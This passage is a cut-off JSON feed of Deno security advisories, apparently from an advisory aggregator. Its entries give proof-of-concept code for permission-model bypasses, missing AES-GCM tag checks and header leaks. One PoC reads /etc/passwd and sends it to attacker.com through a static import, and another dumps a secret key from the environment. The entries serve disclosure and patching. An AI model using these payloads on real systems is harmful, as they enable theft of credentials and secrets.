script.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-10-08T18:16:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-m2gf-x3f6-8hq3","https://nvd.nist.gov/vuln/detail/CVE-2025-61787","https://github.com/denoland/deno/pull/30818","https://github.com/denoland/deno/commit/8a0990ccd37bafd8768176ca64b906ba2da2d822","https://github.com/denoland/deno/releases/tag/v2.2.15","https://github.com/denoland/deno/releases/tag/v2.5.2","https://github.com/advisories/GHSA-m2gf-x3f6-8hq3"],"source_kind":"github","identifiers":["GHSA-m2gf-x3f6-8hq3","CVE-2025-61787"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-10-08T19:00:07.546Z","updated_at":"2026-08-29T17:04:29.137Z","epss_percentage":0.02084,"epss_percentile":0.79507,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.2","vulnerable_version_range":"\u003c 2.5.2"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tMmdmLXgzZjYtOGhxM84ABNIf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe","url":"https://github.com/advisories/GHSA-qq26-84mh-26j9","title":"Deno's --deny-read check does not prevent permission bypass","description":"### Summary \n\n`Deno.FsFile.prototype.stat` and `Deno.FsFile.prototype.statSync` are not limited by the permission model check `--deny-read=./`.\n\nIt's possible to retrieve stats from files that the user do not have explicit read access to  (the script is executed with `--deny-read=./`)\n\nSimilar APIs like `Deno.stat` and `Deno.statSync` require `allow-read` permission, however, when a file is opened, even with file-write only flags and deny-read permission, it's still possible to retrieve file stats, and thus bypass the permission model.\n\n### PoC\n\nSetup:\n```\ndeno --version\ndeno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n\ntouch test1.txt\n```\n\n- `poc_file.stat.ts`\n```ts\n// touch test1.txt\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.stat\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1\n// deno run --allow-write=./ poc_file.stat.ts 1\nasync function poc1(){\n    using file = await Deno.open(\"./test1.txt\", { read: false, write: true});\n    const fileInfo = await file.stat();\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.statSync\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2\n// deno run --allow-write=./ poc_file.stat.ts 2\nfunction poc2(){\n    using file = Deno.openSync(\"./test1.txt\", { read: false, write: true});\n    const fileInfo = file.statSync();\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.stat\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3\n// deno run --allow-write=./ poc_file.stat.ts 3\nasync function poc3(){\n    // not executed\n    const fileInfo = await Deno.stat(\"./test1.txt\");\n    console.log(fileInfo.isFile);\n}\n\n// https://docs.deno.com/api/deno/~/Deno.statSync\n// deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4\n// deno run --allow-write=./ poc_file.stat.ts 4\nfunction poc4(){\n    // not executed\n    const fileInfo = Deno.statSync(\"./test1.txt\");\n    console.log(fileInfo.isFile);\n}\n\n\nasync function main(){\n    const poc = Deno.args[0] || 1;\n\n    const status = await Deno.permissions.query({ name: \"read\", path: \"./\" });\n    console.log(status);\n    switch (poc) {\n        case \"1\":\n            poc1()\n            break;\n        case \"2\":\n            poc2()\n            break;\n        case \"3\":\n            poc3()\n            break;\n        case \"4\":\n            poc4()\n            break;\n        default:\n            poc1()\n    }\n}\n\nmain()\n```\n\n\nOutput:\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 1`\n```\nPermissionStatus { state: \"denied\", onchange: null }\ntrue\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 2`\n```\nPermissionStatus { state: \"denied\", onchange: null }\ntrue\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 3`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires read access to \"./test1.txt\", run again with the --allow-read flag\n    const fileInfo = await Deno.stat(\"./test1.txt\");\n                                ^\n    ...\n```\n\n- `deno run --deny-read=./ --allow-write=./ poc_file.stat.ts 4`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires read access to \"./test1.txt\", run again with the --allow-read flag\n    const fileInfo = Deno.statSync(\"./test1.txt\");\n                          ^\n    ...\n```\n\n\n### Impact\n\nPermission model bypass","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-10-08T17:56:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.3,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-qq26-84mh-26j9","https://nvd.nist.gov/vuln/detail/CVE-2025-61786","https://github.com/denoland/deno/pull/30876","https://github.com/denoland/deno/commit/1ab2268c0bcbf9b0468e0e36963f77f8c31c73ec","https://github.com/denoland/deno/releases/tag/v2.2.15","https://github.com/denoland/deno/releases/tag/v2.5.3","https://github.com/advisories/GHSA-qq26-84mh-26j9"],"source_kind":"github","identifiers":["GHSA-qq26-84mh-26j9","CVE-2025-61786"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-10-08T18:00:06.987Z","updated_at":"2026-08-29T17:04:29.138Z","epss_percentage":0.00182,"epss_percentile":0.07992,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.3","vulnerable_version_range":"\u003c 2.5.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xcTI2LTg0bWgtMjZqOc4ABNIe/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_","url":"https://github.com/advisories/GHSA-vg2r-rmgp-cgqj","title":"Deno's --deny-write check does not prevent permission bypass","description":"### Summary\n\n`Deno.FsFile.prototype.utime` and `Deno.FsFile.prototype.utimeSync` are not limited by the permission model check `--deny-write=./`.\n\nIt's possible to change to change the access (`atime`) and modification (`mtime`) times on the file stream resource even when the file is opened with `read` only permission (and `write`: `false`) and file write operations are not allowed (the script is executed with `--deny-write=./`).\n\nSimilar APIs like `Deno.utime` and `Deno.utimeSync` require `allow-write` permission, however, when a file is opened, even with read only flags and deny-write permission, it's still possible to change the access (`atime`) and modification (`mtime`) times, and thus bypass the permission model.\n\n### PoC\n\nSetup:\n```\ndeno --version\ndeno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n\ntouch test.txt\n```\n\n```js\n// touch test.txt\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1\nasync function poc1(){\n    using file = await Deno.open(\"./test.txt\", { read: true, write: false});\n\n    const fileInfoBefore = await file.stat();\n    \n    await file.utime(new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n    \n    const fileInfoAfter = await file.stat();\n    \n    \n    console.log(`BEFORE (utime)`)\n    console.log(new Date(fileInfoBefore.mtime).getFullYear())\n    console.log(new Date(fileInfoBefore.atime).getFullYear())\n    \n    \n    console.log(`AFTER (utime)`)\n    console.log(new Date(fileInfoAfter.mtime).getFullYear())\n    console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2\nfunction poc2(){\n    using file = Deno.openSync(\"./test.txt\", { read: true, write: false});\n\n    const fileInfoBefore = file.statSync();\n    \n    file.utimeSync(new Date(\"2001-01-01\"), new Date(\"2001-01-01\"));\n    \n    const fileInfoAfter = file.statSync();\n    \n    \n    console.log(`BEFORE (utimeSync)`)\n    console.log(new Date(fileInfoBefore.mtime).getFullYear())\n    console.log(new Date(fileInfoBefore.atime).getFullYear())\n    \n    \n    console.log(`AFTER (utimeSync)`)\n    console.log(new Date(fileInfoAfter.mtime).getFullYear())\n    console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3\nasync function poc3(){\n    // not executed\n    await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4\nfunction poc4(){\n    // not executed\n    Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n\nasync function main(){\n    const poc = Deno.args[0] || 1;\n\n    const status = await Deno.permissions.query({ name: \"write\", path: \"./\" });\n    console.log(status);\n    switch (poc) {\n        case \"1\":\n            poc1()\n            break;\n        case \"2\":\n            poc2()\n            break;\n        case \"3\":\n            poc3()\n            break;\n        case \"4\":\n            poc4()\n            break;\n        default:\n            poc1()\n    }\n}\n\nmain()\n```\n\nOutput:\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utime)\n2025\n2025\nAFTER (utime)\n2000\n2000\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utimeSync)\n2000\n2000\nAFTER (utimeSync)\n2001\n2001\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n    await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n               ^\n    ...\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n    Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n         ^\n    ...\n```\n\n\n### Impact\n\nPermission model bypass","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-10-07T22:36:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.3,"cvss_vector":"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-vg2r-rmgp-cgqj","https://github.com/denoland/deno/pull/30872","https://github.com/denoland/deno/commit/992e998dfe436cdc9325232759af8be92f11739b","https://nvd.nist.gov/vuln/detail/CVE-2025-61785","https://github.com/denoland/deno/releases/tag/v2.2.15","https://github.com/denoland/deno/releases/tag/v2.5.3","https://github.com/advisories/GHSA-vg2r-rmgp-cgqj"],"source_kind":"github","identifiers":["GHSA-vg2r-rmgp-cgqj","CVE-2025-61785"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-10-07T23:00:06.474Z","updated_at":"2026-08-29T17:04:29.139Z","epss_percentage":0.00184,"epss_percentile":0.08169,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.5.3","vulnerable_version_range":"\u003c 2.5.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZzJyLXJtZ3AtY2dxas4ABNF_/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0","url":"https://github.com/advisories/GHSA-jv4x-jv3h-qff5","title":"Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor","description":"### Summary\n\nStatic imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.\n\n### Details\n\nStatic imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with `deno run`:\n\n1. The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.\n2. When `--allow-write` and `--allow-read` permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.\n\n### PoC\n\n```ts\nconst __filename = new URL(\"\", import.meta.url).pathname;\nlet oldContent = await Deno.readTextFile(__filename);\nlet passFile = await Deno.readTextFile(\"/etc/passwd\");\nlet pre =\n  'import {foo} from \"[https://attacker.com?val=](https://attacker.com/?val=)' +\n  encodeURIComponent(passFile) + '\";\\n';\nawait Deno.writeTextFile(__filename, pre + oldContent);\n```\n\nExecuting a file containing this payload twice, with `deno run --allow-read --allow-write` would cause the password file to leak on the network, even though no network permission was granted.\n\nThis vulnerability was fixed with the addition of the `--allow-import` flag: https://docs.deno.com/runtime/fundamentals/security/#network-access","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-05T01:21:08.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-jv4x-jv3h-qff5","https://github.com/advisories/GHSA-jv4x-jv3h-qff5"],"source_kind":"github","identifiers":["GHSA-jv4x-jv3h-qff5","CVE-2024-21486"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-06-05T02:07:58.220Z","updated_at":"2026-08-29T17:05:04.955Z","epss_percentage":0.00842,"epss_percentile":0.75257,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.0.0","vulnerable_version_range":"\u003c 2.0.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qdjR4LWp2M2gtcWZmNc4ABIp0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","url":"https://github.com/advisories/GHSA-8vxj-4cph-c596","title":"Deno has --allow-read / --allow-write permission bypass in `node:sqlite`","description":"## Summary\n\nIt is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement.\n\n## PoC\n\n```js\n// poc.js\nimport { DatabaseSync } from \"node:sqlite\"\n\nconst db = new DatabaseSync(\":memory:\");\ndb.exec(\"ATTACH DATABASE 'test.db' as test;\");\n\ndb.exec(\"CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);\");\n```\n\n```\n$ deno poc.js\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:22:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596","https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860","https://nvd.nist.gov/vuln/detail/CVE-2025-48935","https://rustsec.org/advisories/RUSTSEC-2025-0138.html","https://github.com/advisories/GHSA-8vxj-4cph-c596"],"source_kind":"github","identifiers":["GHSA-8vxj-4cph-c596","CVE-2025-48935"],"repository_url":"https://github.com/denoland/deno","blast_radius":4.96699492845569,"created_at":"2025-06-04T22:08:12.441Z","updated_at":"2026-09-07T05:05:33.179Z","epss_percentage":0.00468,"epss_percentile":0.38789,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.134.0","vulnerable_version_range":"\u003e= 0.129.0, \u003c 0.134.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.5","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.5"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04dnhqLTRjcGgtYzU5Ns4ABIpO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","url":"https://github.com/advisories/GHSA-7w8p-chxq-2789","title":"Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables","description":"### Summary\nThe [Deno.env.toObject](https://docs.deno.com/api/deno/~/Deno.Env.toObject) method ignores any variables listed in the `--deny-env` option of the `deno run` command. When looking at the [documentation](https://docs.deno.com/runtime/fundamentals/security/#environment-variables) of the `--deny-env` option this might lead to a false impression that variables listed in the option are impossible to read.\n\n### PoC\n\n```\nexport AWS_SECRET_ACCESS_KEY=my-secret-aws-key\n\n# Works as expected. The program stops with a \"NotCapable\" error message\necho 'console.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));' | deno run \\\n  --allow-env \\\n  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n\n# All enviroment variables are printed and the --deny-env list is completely disregarded\necho 'console.log(Deno.env.toObject());' | deno run \\\n  --allow-env \\\n  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n```\n\nThe first example using `get` exits with the following error:\n```\nerror: Uncaught (in promise) NotCapable: Requires env access to \"AWS_SECRET_ACCESS_KEY\", run again with the --allow-env flag\nconsole.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));\n                     ^\n    at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)\n    at file:///$deno$stdin.mts:1:22\n```\n\nThe second example  using `toObject` prints all environment variables:\n```\n[Object: null prototype] {\n  ...\n  AWS_SECRET_ACCESS_KEY: \"my-secret-aws-key\",\n  ...\n}\n```\n\n### Impact\nSoftware relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:18:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-7w8p-chxq-2789","https://github.com/denoland/deno/pull/29079","https://github.com/denoland/deno/commit/2959e083912420988066a001c2b2d6732a1b562f","https://github.com/denoland/deno/commit/946ccda1aa19a00c478a5e6826b75053b050d753","https://docs.deno.com/api/deno/~/Deno.Env.toObject","https://docs.deno.com/runtime/fundamentals/security/#environment-variables","https://nvd.nist.gov/vuln/detail/CVE-2025-48934","https://github.com/advisories/GHSA-7w8p-chxq-2789"],"source_kind":"github","identifiers":["GHSA-7w8p-chxq-2789","CVE-2025-48934"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.484Z","updated_at":"2026-09-07T05:05:33.180Z","epss_percentage":0.00426,"epss_percentile":0.35616,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","url":"https://github.com/advisories/GHSA-xqxc-x6p3-w683","title":"Deno run with --allow-read and --deny-read flags results in allowed","description":"### Summary\n\n`deno run --allow-read --deny-read main.ts` results in allowed, even though 'deny' should be stronger. Same with all global unary permissions given as `--allow-* --deny-*`.\n\n### Details\n\nCaused by the fast exit logic in #22894.\n\n### PoC\n\nRun the above command expecting no permissions to be passed.\n\n### Impact\n\nThis only affects a nonsensical combination of flags, so there shouldn't be a real impact on the userbase.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:13:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-xqxc-x6p3-w683","https://github.com/denoland/deno/pull/22894","https://github.com/denoland/deno/pull/29213","https://github.com/denoland/deno/commit/2f0fae9d9071dcaf0a689bc7097584b1b9ebc8db","https://github.com/denoland/deno/commit/9d665572d3cd39f997e29e6daac7c1102fc5c04f","https://github.com/denoland/deno/commit/ef315b56c26c9ef5f25284a5100d2ed525a148cf","https://nvd.nist.gov/vuln/detail/CVE-2025-48888","https://github.com/advisories/GHSA-xqxc-x6p3-w683"],"source_kind":"github","identifiers":["GHSA-xqxc-x6p3-w683","CVE-2025-48888"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.932Z","updated_at":"2026-09-07T05:05:33.181Z","epss_percentage":0.00406,"epss_percentile":0.33785,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003e= 0.150.0, \u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.3.2","vulnerable_version_range":"\u003e= 2.3.0, \u003c 2.3.2"},{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003e= 1.41.3, \u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","url":"https://github.com/advisories/GHSA-2x3r-hwv5-p32x","title":"Deno's AES GCM authentication tags are not verified","description":"### Summary\n\nThis affects AES-256-GCM and AES-128-GCM in Deno, introduced by commit [0d1beed](https://github.com/denoland/deno/commit/0d1beed). Specifically, the authentication tag is not being validated. This means tampered ciphertexts or incorrect keys might not be detected, which breaks the guarantees expected from AES-GCM. Older versions of Deno correctly threw errors in such cases, as does Node.js.\n\nWithout authentication tag verification, AES-GCM degrades to essentially CTR mode, removing integrity protection. Authenticated data set with set_aad is also affected, as it is incorporated into the GCM hash (ghash) but this too is not validated, rendering AAD checks ineffective.\n\n### PoC\n\n```ts\nimport { Buffer } from \"node:buffer\";\nimport {\n  createCipheriv,\n  createDecipheriv,\n  randomBytes,\n  scrypt,\n} from \"node:crypto\";\n\ntype Encrypted = {\n  salt: string;\n  iv: string;\n  enc: string;\n  authTag: string;\n};\n\nconst deriveKey = (key: string, salt: Buffer) =\u003e\n  new Promise\u003cBuffer\u003e((res, rej) =\u003e\n    scrypt(key, salt, 32, (err, k) =\u003e {\n      if (err) rej(err);\n      else res(k);\n    })\n  );\n\nasync function encrypt(text: string, key: string): Promise\u003cEncrypted\u003e {\n  const salt = randomBytes(32);\n  const k = await deriveKey(key, salt);\n\n  const iv = randomBytes(16);\n  const enc = createCipheriv(\"aes-256-gcm\", k, iv);\n  const ciphertext = enc.update(text, \"binary\", \"binary\") + enc.final(\"binary\");\n\n  return {\n    salt: salt.toString(\"binary\"),\n    iv: iv.toString(\"binary\"),\n    enc: ciphertext,\n    authTag: enc.getAuthTag().toString(\"binary\"),\n  };\n}\n\nasync function decrypt(enc: Encrypted, key: string) {\n  const k = await deriveKey(key, Buffer.from(enc.salt, \"binary\"));\n  const dec = createDecipheriv(\"aes-256-gcm\", k, Buffer.from(enc.iv, \"binary\"));\n\n  const out = dec.update(enc.enc, \"binary\", \"binary\");\n  dec.setAuthTag(Buffer.from(enc.authTag, \"binary\"));\n  return out + dec.final(\"binary\");\n}\n\nconst test = await encrypt(\"abcdefghi\", \"key\");\ntest.enc = \"\";\nconsole.log(await decrypt(test, \"\")); // no error\n```\n\n### Impact\n\nWhile discovered through experimentation, authentication failures that should raise errors may be silently ignored.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-06-04T20:48:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-2x3r-hwv5-p32x","https://nvd.nist.gov/vuln/detail/CVE-2025-24015","https://github.com/denoland/deno/commit/0d1beed2e3633d71d5e288e0382b85be361ec13d","https://github.com/denoland/deno/commit/4f27d7cdc02e3edfb9d36275341fb8185d6e99ed","https://github.com/denoland/deno/commit/a4003a5292bd0affefad3ecb24a8732886900f67","https://github.com/denoland/deno/commit/0d1beed","https://github.com/advisories/GHSA-2x3r-hwv5-p32x"],"source_kind":"github","identifiers":["GHSA-2x3r-hwv5-p32x","CVE-2025-24015"],"repository_url":"https://github.com/denoland/deno","blast_radius":6.953792899837965,"created_at":"2025-06-04T21:08:18.873Z","updated_at":"2026-09-07T05:05:33.184Z","epss_percentage":0.00275,"epss_percentile":0.19509,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI","packages":[{"ecosystem":"cargo","package_name":"deno_node","versions":[{"first_patched_version":"0.125.0","vulnerable_version_range":"\u003e= 0.102.0, \u003c 0.125.0"}],"purl":"pkg:cargo/deno_node"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.7","vulnerable_version_range":"\u003e= 1.46.0, \u003c 2.1.7"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yeDNyLWh3djUtcDMyeM4ABIpI/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","url":"https://github.com/advisories/GHSA-f27p-cmv8-xhm6","title":"fetch: Authorization headers not dropped when redirecting cross-origin","description":"### Summary\nWhen you send a request with the `Authorization` header to one domain, and the response asks to redirect to a different domain, Deno's`fetch()` redirect handling creates a follow-up redirect request that keeps the original `Authorization` header, leaking its content to that second domain.\n\n\n### Details\n\nThe [right behavior](https://fetch.spec.whatwg.org/#ref-for-cors-non-wildcard-request-header-name) would be to drop the `Authorization` header instead, in this scenario. The same is generally applied to `Cookie` and `Proxy-Authorization` headers, and is done for not only host changes, but also protocol/port changes. Generally referred to as \"origin\".\n\nThe [documentation](https://docs.deno.com/runtime/reference/web_platform_apis/#:~:text=Deno%20does%20not%20follow%20the,leaking%20authenticated%20data%20cross%20origin.) states: \n\u003e Deno does not follow the same-origin policy, because the Deno user agent currently does not have the concept of origins, and it does not have a cookie jar. This means Deno **does not need** to protect against leaking authenticated data cross origin \n\n### Reproduction\n```ts\nconst ac = new AbortController()\n\nconst server1 = 